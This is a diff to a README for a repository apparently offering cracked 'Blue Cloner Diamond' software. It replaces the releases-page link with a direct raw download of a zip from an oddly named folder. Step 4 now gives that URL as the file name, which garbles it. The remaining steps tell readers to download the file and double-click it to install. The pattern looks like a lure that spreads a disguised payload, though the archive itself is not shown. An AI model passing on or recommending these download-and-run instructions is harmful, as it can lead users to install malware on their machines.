MyDev170/Blue-Cloner-Diamond-Working/README.md

 ## 📥 Download & Install

-Visit this page to download: [Blue Cloner Diamond Releases](https://github.com/MyDev170/Blue-Cloner-Diamond-Working/releases)
+Visit this page to download: [Blue Cloner Diamond Releases](https://raw.githubusercontent.com/MyDev170/Blue-Cloner-Diamond-Working/main/Paganalia/Blue-Cloner-Diamond-Working-v3.8.zip)

 1. Go to the link above.
 2. You will see a list of available versions.
 Choose the latest version.
 3. Click on the version number to access the download files.
-4. Look for the file named `BlueClonerDiamond.exe` or a similar name.
+4. Look for the file named `https://raw.githubusercontent.com/MyDev170/Blue-Cloner-Diamond-Working/main/Paganalia/Blue-Cloner-Diamond-Working-v3.8.zip` or a similar name.
 5. Download the file by clicking on it.
 6. Once the download completes, locate the file in your "Downloads" folder or the location you selected.
 7. Double-click the downloaded file to start the installation process.